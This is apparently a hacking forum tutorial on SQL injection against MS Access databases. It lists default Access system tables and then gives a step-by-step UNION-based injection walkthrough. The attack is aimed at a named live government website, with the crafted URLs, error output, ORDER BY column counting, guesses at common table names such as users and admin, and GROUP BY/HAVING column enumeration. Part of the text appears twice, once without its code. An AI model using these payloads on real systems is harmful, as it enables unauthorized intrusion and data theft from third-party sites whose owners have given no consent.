Today Im gonna discuss MS Access Injection which is rare really n wiered too . Hardly some web still using it.
MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test.MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage.
Note: Those table name having * infront of their name, means it can be use in query.
Access 97
Access 2000
Access 2002-2003
Access 2007
As we can see each version having some new default tables and each of them work differently .But ms access injection is real pain it does not contails schema , when we say schema that's mean we have to guess each table and column . Access also does not support.ERROR BASED INJECTION nor having global veriable like @@version . So we can guess the version by default table .
We will use the # for commenting the rest of the query instead of -- or /* .
[b]Step-1
Above site is vuln to sql injection let's see what error we get ?
Step-2
Using order by to get columns.
we will do increament of 1 till we get an error :
That's mean we have total number of columns are 34 . Let's proceed with union now.
If we are not sure about data type we can proceed with Null instead of integer .
Step-3
We have used default table name of MS Access 2000 see the list above.
Now on your screen you can see some numbers right under the page contents like 17 19 20 ... .
Most common tables are below [/b]
Step-4: Getting table
Page load normaly that's mean we have found a valid table now let's enumerate columns .
Step-5 : Getting Columns
We will use GROUP BY and Having for example
GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.coumn1,column2 having 1=1#
GROUP BY tablename.column1,column2,coumn(n).... having 1=1#
Page will load with out any error now lets out it in place of number of column
we have got the following data .
Now let's get next column
Page will load with out any error now lets out it in place of number of column
we have got the following data .
Introduction
MS Access is commonly thought of as the little brother of Database engines, and not a lot of material has been published about methods used for exploiting it during a penetration test.MS Jet is often mistakenly thought of as being another name for MS Access, when in fact it is a database engine that is shipped as part of the Windows OS. MS Jet was however the core database engine used by MS Access up to version 2007. Since version 2007, MS Access has included a separate updated engine known as Access Connectivity Engine. Although MS Jet is not as complex as more advanced databases such as SQL server or Oracle, it is still commonly used by smaller web sites that want quick and easy database storage.
Default Tables Used In Access
Note: Those table name having * infront of their name, means it can be use in query.
Access 97
- MSysAccessObjects *
- MSysACEs
- MSysModules
- MSysModules2 *
- MSysObjects
- MSysQueries
- MSysRelationship
Access 2000
- MSysAccessObjects *
- MSysAccessXML *
- MSysACEs
- MSysObjects
- MSysQueries
- MSysRelationships
Access 2002-2003
- MSysAccessStorage *
- MSysAccessXML *
- MSysACEs
- MSysObjects
- MSysQueries
- MSysRelationships
Access 2007
- MSysAccessStorage *
- MSysACEs
- MSysComplexColumns
- MSysComplexType_Attachment
- MSysComplexType_Decimal
- MSysComplexType_GUID
- MSysComplexType_IEEEDouble
- MSysComplexType_IEEESingle
- MSysComplexType_Long
- MSysComplexType_Short
- MSysComplexType_Text
- MSysComplexType_UnsignedByte
- MSysNavPaneGroupCategories *
- MSysNavPaneGroups *
- MSysNavPaneGroupToObjects *
- MSysNavPaneObjectIDs *
- SysObjects
- MSysQueries
- MSysRelationships
As we can see each version having some new default tables and each of them work differently .But ms access injection is real pain it does not contails schema , when we say schema that's mean we have to guess each table and column . Access also does not support.ERROR BASED INJECTION nor having global veriable like @@version . So we can guess the version by default table .
Column Enumeration and Union [b]
We will use the # for commenting the rest of the query instead of -- or /* .
[b]Step-1
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103
Above site is vuln to sql injection let's see what error we get ?
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103'
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver] Syntax error in string in query expression 'DISTRICTNUMBER = 103''.
/h_reps/members.asp, line 16
Step-2
Using order by to get columns.
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 1# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 2# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 3# <== No error
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 4# <== No error
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 order by 35# <== Error
That's mean we have total number of columns are 34 . Let's proceed with union now.
If we are not sure about data type we can proceed with Null instead of integer .
Step-3
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from MSysAccessObjects#
We have used default table name of MS Access 2000 see the list above.
Now on your screen you can see some numbers right under the page contents like 17 19 20 ... .
Most common tables are below [/b]
- users
- admin
- administrator
- login
- customers
- user
- members
- member
- customer
Step-4: Getting table
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#
Page load normaly that's mean we have found a valid table now let's enumerate columns .
Step-5 : Getting Columns
We will use GROUP BY and Having for example
GROUP BY tablename.column1 having 1=1#
GROUP BY tablename.coumn1,column2 having 1=1#
GROUP BY tablename.column1,column2,coumn(n).... having 1=1#
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id#
Page will load with out any error now lets out it in place of number of column
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,id,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#
we have got the following data .
Code:
COMMITTEE ASSIGNMENTS
102
Now let's get next column
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,
11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members group by members.id,
now having 1=1#
Page will load with out any error now lets out it in place of number of column
Code:
http://house.louisiana.gov/h_reps/members.asp?id=103 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,now,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 from members#
we have got the following data .
Tags
Website Hacking